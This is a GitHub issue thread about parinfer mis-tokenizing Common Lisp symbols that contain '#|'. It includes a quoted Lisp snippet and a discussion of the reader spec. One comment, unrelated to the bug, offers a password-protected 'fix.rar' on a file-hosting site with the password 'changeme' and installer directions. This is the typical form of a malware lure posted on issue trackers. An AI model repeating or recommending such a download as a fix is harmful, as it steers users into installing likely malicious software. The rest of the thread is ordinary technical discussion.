### ISSUE TITLE
Weird edge cases around #| (Common Lisp)

### ISSUE THREAD

**Issue by gilch** [parinfer/parinfer.js#212]
Tested with the Spacemacs layer, so reported here: https://github.com/justinbarclay/parinfer-rust-emacs/issues/15

I'm not sure how far upstream the problem goes, but the trailing brackets don't get added as expected.

Here, a single quoted symbol doesn't seem to be tokenizing properly:
```lisp
(defun foo (
  2

'foo#|bar|
```
I checked [the spec](https://www.lispworks.com/documentation/HyperSpec/Body/02_b.htm). That's a symbol, not a symbol followed by a start comment reader macro, and should tokenize as such.

`#` can't start a symbol, but it is allowed inside symbols (*non-terminating macro character*), and `|`s are allowed as long as there's an even number (`\|` doesn't count). (`|` is the standard *multiple escape* character.)

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by shaunlebron** [comment]
Thanks.  I couldn’t reproduce it in the demo editor, so it’s downstream:
https://shaunlebron.github.io/parinfer/demo

**Comment by gilch** [comment]
Confirmed not in the demo editor. If that's configured for Clojure, I wouldn't expect it to show up though. Is there a Common Lisp configuration/mode we could try, or does that only exist downstream?
